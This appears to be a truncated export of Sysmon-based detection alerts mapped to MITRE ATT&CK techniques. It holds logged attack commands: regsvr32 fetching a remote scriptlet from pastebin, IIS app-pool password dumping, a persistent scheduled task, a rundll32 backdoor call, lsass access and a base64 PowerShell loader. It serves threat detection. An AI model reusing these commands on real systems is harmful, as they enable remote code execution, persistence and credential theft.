AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1," 1 5 4 1 0 0x8000000000000000 6195 Microsoft-Windows-Sysmon/Operational IEWIN7 Persistence - Scheduled Task Management 2019-05-27 15:12:59.558 365ABB72-FE7B-5CEB-0000-0010D6820C00 4044 C:\Windows\System32\schtasks.exe 6.1.7600.16385 (win7_rtm.090713-1255) Manages scheduled tasks Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 365ABB72-FE7B-5CEB-0000-0010867F0C00 4012 C:\Windows\System32\cmd.exe cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.041809,2019-05-27T05:29:18.041809+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password ),1," 1 5 4 1 0 0x8000000000000000 5910 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.011 365ABB72-3D6E-5CEB-0000-00104C83FF00 2472 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 16116 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-11 17:58:50.075 365ABB72-0D5A-5CD7-0000-001069031700 2544 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation c:\Windows\System32\cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-8693-5CD7-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-0D3F-5CD7-0000-00107F541600 3212 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 16116 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-11 17:58:50.075 365ABB72-0D5A-5CD7-0000-001069031700 2544 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation c:\Windows\System32\cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-8693-5CD7-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-0D3F-5CD7-0000-00107F541600 3212 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 16116 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-11 17:58:50.075 365ABB72-0D5A-5CD7-0000-001069031700 2544 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation c:\Windows\System32\cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-8693-5CD7-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-0D3F-5CD7-0000-00107F541600 3212 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll)",1," 1 5 4 1 0 0x8000000000000000 16792 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 18:35:05.140 365ABB72-6759-5CD8-0000-0010E2D50F00 1420 C:\Windows\System32\regsvr32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-63FC-5CD8-0000-0020EE3E0100 0x13eee 1 Medium SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 365ABB72-6693-5CD8-0000-0010AE4C0E00 3528 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 18918 Microsoft-Windows-Sysmon/Operational DC1.insecurebank.local technique_id=T1033,technique_name=System Owner/User Discovery 2019-05-16 16:08:40.350 DFAE8213-8B08-5CDD-0000-001011CE0A00 3764 C:\Windows\System32\whoami.exe 6.3.9600.16384 (winblue_rtm.130821-1623) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami C:\Windows\system32\ NT AUTHORITY\SYSTEM DFAE8213-832F-5CDD-0000-0020E7030000 0x3e7 2 System SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47 DFAE8213-8B02-5CDD-0000-00109BCA0A00 1720 C:\Windows\System32\osk.exe "C:\Windows\System32\osk.exe" ",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 16792 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 18:35:05.140 365ABB72-6759-5CD8-0000-0010E2D50F00 1420 C:\Windows\System32\regsvr32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-63FC-5CD8-0000-0020EE3E0100 0x13eee 1 Medium SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 365ABB72-6693-5CD8-0000-0010AE4C0E00 3528 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1," 1 5 4 1 0 0x8000000000000000 16792 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 18:35:05.140 365ABB72-6759-5CD8-0000-0010E2D50F00 1420 C:\Windows\System32\regsvr32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-63FC-5CD8-0000-0020EE3E0100 0x13eee 1 Medium SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 365ABB72-6693-5CD8-0000-0010AE4C0E00 3528 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243538 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.021 747F3D96-9F69-5E75-0000-00106F6A2000 2536 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1589329703.257302,2020-05-13T04:28:23.257302+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 148597 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-13 00:28:16.115 747F3D96-3F20-5EBB-0000-0010035E3600 8052 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\system32\cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-3821-5EBB-0000-0020E7030000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-3821-5EBB-0000-001040690000 732 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243538 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.021 747F3D96-9F69-5E75-0000-00106F6A2000 2536 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c pause ),1," 1 5 4 1 0 0x8000000000000000 376 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 00:35:07.386 365ABB72-47BB-5CE3-0000-00108CAD3E00 3176 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.exe /c pause C:\Users\IEUser\Downloads\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-47BB-5CE3-0000-0010BFA83E00 1912 C:\Users\IEUser\Downloads\com-hijack.exe "C:\Users\IEUser\Downloads\com-hijack.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243538 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.021 747F3D96-9F69-5E75-0000-00106F6A2000 2536 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558969979.57807,2019-05-27T19:12:59.578070+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1," 1 5 4 1 0 0x8000000000000000 6193 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:59.510 365ABB72-FE7B-5CEB-0000-0010867F0C00 4012 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1003] Credential Dumping - Process Access,1552849805.303341,2019-03-17T23:10:05.303341+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," 10 3 4 10 0 0x8000000000000000 4442 Microsoft-Windows-Sysmon/Operational PC04.example.corp 2019-03-17 19:10:02.068 365ABB72-9B85-5C8E-0000-0010C4CC1200 3576 3620 C:\Windows\system32\taskmgr.exe 365ABB72-0886-5C8F-0000-001030560000 476 C:\Windows\system32\lsass.exe 0x1fffff C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Windows\system32\taskmgr.exe+1360e|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d ",PC04.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557686932.766629,2019-05-12T22:48:52.766629+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 16840 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 18:48:52.344 365ABB72-6A94-5CD8-0000-0010C2F10E00 3880 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" c:\ProgramData\ IEWIN7\IEUser 365ABB72-695E-5CD8-0000-002015370100 0x13715 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-6A94-5CD8-0000-00101BDB0E00 1340 C:\ProgramData\jabber.exe jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.971708,2019-05-27T05:29:17.971708+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username ),1," 1 5 4 1 0 0x8000000000000000 5907 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.931 365ABB72-3D6D-5CEB-0000-00108C7FFF00 3196 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQ